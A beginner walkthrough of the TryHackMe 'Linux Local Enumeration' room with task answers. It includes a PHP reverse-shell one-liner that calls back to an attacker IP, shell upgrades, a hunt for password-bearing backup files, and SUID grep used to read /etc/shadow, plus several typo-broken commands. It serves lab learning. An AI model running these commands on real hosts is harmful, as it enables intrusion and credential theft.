Linux Local Enumeration on Tryhackme

This is the write up for the room Linux Local Enumeration on Tryhackme and it is part of the complete beginners path

Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment.

Tasks Linux Local Enumeration

Task 1

Read all that is in the task start the machine attached to this task

Connect to the machine by navigating to MACHINE_IP:3000 with firefox

I’m using method one

Start a listner in a terminal by typing

nc -nlvp 444

Navigate to MACHINE_IP:3000/cmd

Put in the following ( change IP to your tun0 ip )

php -r '$sock=fsockopen("10.9.135.33",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

You now have a shell. Upgrade shell by typing in

python3 -c 'import pty; pty.spawn("/bin/bash")'

Task 2

2.1 How would you execute /bin/bash with perl?

Google perl bin bash shell. I came across this site
Spawning a TTY Shell (netsec.ws)

Answer: perl —e 'exec "/bin/bash";'

Task 3

3.1 Where can you usually find the id_rsa file? (User = user)

Answer: /home/user/.ssh/id_rsa

3.2 Is there an id_rsa file on the box? (yay/nay)

In the shell navigate to .shh

Answer: nay

Task 4

4.1 How would you print machine hardware name only?

Answer uname -m

4.2 Where can you find bash history?

Answer ~/.bash_history

4.3 What’s the flag?

Type in

cat .bash_history

The flag is in this file. Just read the history

Task 5

Read all that is in the task

5.1 Can you read /etc/passwd on the box? (yay/nay)

Type in the command

cat /etc/passwd

Answer yay

Task 6

Read all that is in the task

6.1 What’s the password you found?

Navigate to the root then type in the following command

find -type f -name '*.bak" 2>dev/null

cat the correct file and notice the password

6.2 Did you find a flag?

Type in the command

find -type f -name "*.conf" 2>dev/null

There is a very long list bu tlook closer and you find

./etc/sysconf/flag.conf

Cat this to screen and you will see the flag

Task 7

7.1 Which SUID binary has a way to escalate your privileges on the box?

Type in the command

find / -perm -u=s -type f 2>/dev/null

If we look trough the list on GTFObins we find grep

Answer grep

7.2 What’s the payload you can use to read /etc/shadow with this SUID?

We know grep can read root files.

Answer grep '' /etc/shadow

You now see the password list.

Task 8

Use both command on your machine to see the results then press complete

Task 9

Notice the 2 script LinPeas and LinEnum. There are also windows version of these tools to run on Windows platforms

Press complete

Task 10

Read all that is in the task and press complete